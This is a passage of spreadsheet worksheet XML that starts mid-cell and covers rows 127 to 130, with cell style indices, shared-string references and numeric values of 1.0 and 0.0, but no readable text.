      </c>
      <c r="M127" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N127" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O127" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P127" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q127" s="208"/>
      <c r="R127" s="208"/>
      <c r="S127" s="208"/>
      <c r="T127" s="208"/>
      <c r="U127" s="208"/>
      <c r="V127" s="208"/>
    </row>
    <row r="128" ht="90.0" customHeight="1">
      <c r="B128" s="44" t="s">
        <v>1095</v>
      </c>
      <c r="C128" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D128" s="45" t="s">
        <v>1106</v>
      </c>
      <c r="E128" s="45" t="s">
        <v>1107</v>
      </c>
      <c r="F128" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G128" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H128" s="46" t="s">
        <v>1108</v>
      </c>
      <c r="I128" s="46" t="s">
        <v>323</v>
      </c>
      <c r="J128" s="46" t="s">
        <v>1109</v>
      </c>
      <c r="K128" s="47">
        <v>1.0</v>
      </c>
      <c r="L128" s="47">
        <v>0.0</v>
      </c>
      <c r="M128" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N128" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O128" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P128" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q128" s="208"/>
      <c r="R128" s="208"/>
      <c r="S128" s="208"/>
      <c r="T128" s="208"/>
      <c r="U128" s="208"/>
      <c r="V128" s="208"/>
    </row>
    <row r="129" ht="90.0" customHeight="1">
      <c r="B129" s="44" t="s">
        <v>1095</v>
      </c>
      <c r="C129" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D129" s="45" t="s">
        <v>1116</v>
      </c>
      <c r="E129" s="45" t="s">
        <v>1117</v>
      </c>
      <c r="F129" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G129" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H129" s="46" t="s">
        <v>1118</v>
      </c>
      <c r="I129" s="46" t="s">
        <v>162</v>
      </c>
      <c r="J129" s="46" t="s">
        <v>1119</v>
      </c>
      <c r="K129" s="47">
        <v>1.0</v>
      </c>
      <c r="L129" s="47">
        <v>0.0</v>
      </c>
      <c r="M129" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N129" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O129" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P129" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q129" s="208"/>
      <c r="R129" s="208"/>
      <c r="S129" s="208"/>
      <c r="T129" s="208"/>
      <c r="U129" s="208"/>
      <c r="V129" s="208"/>
    </row>
    <row r="130" ht="90.0" customHeight="1">
      <c r="B130" s="74" t="s">
        <v>1095</v>
      </c>
      <c r="C130" s="75" t="s">
        <v>10</v>
      </c>
      <c r="D130" s="75" t="s">
        <v>1120</v>
      </c>
      <c r="E130" s="75" t="s">
        <v>1121</v>
      </c>
      <c r="F130" s="75" t="s">
        <v>1122</v>
      </c>
      <c r="G130" s="75" t="s">
        <v>1123</v>
      </c>
      <c r="H130" s="77" t="s">
        <v>1124</v>
      </c>
      <c r="I130" s="77" t="s">
        <v>1125</v>
      </c>
      <c r="J130" s="77" t="s">
        <v>1126</v>
      </c>
      <c r="K130" s="47">
        <v>1.0</v>
      </c>
      <c r="L130" s="47">
        <v>0.0</v>
      </c>
      <c r="M130" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N130" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O130" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P130" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q130" s="208"/>
      <c r="R130" s="208"/>
      <c r="S130" s="208"/>
      <c r="T130" s="208"/>
      <c r="U130" s="208"/>
      <c r="V130" s="208"/>
    </row>
  </sheetData>
  <drawing r:id="rId1"/>
</worksheet>
</file>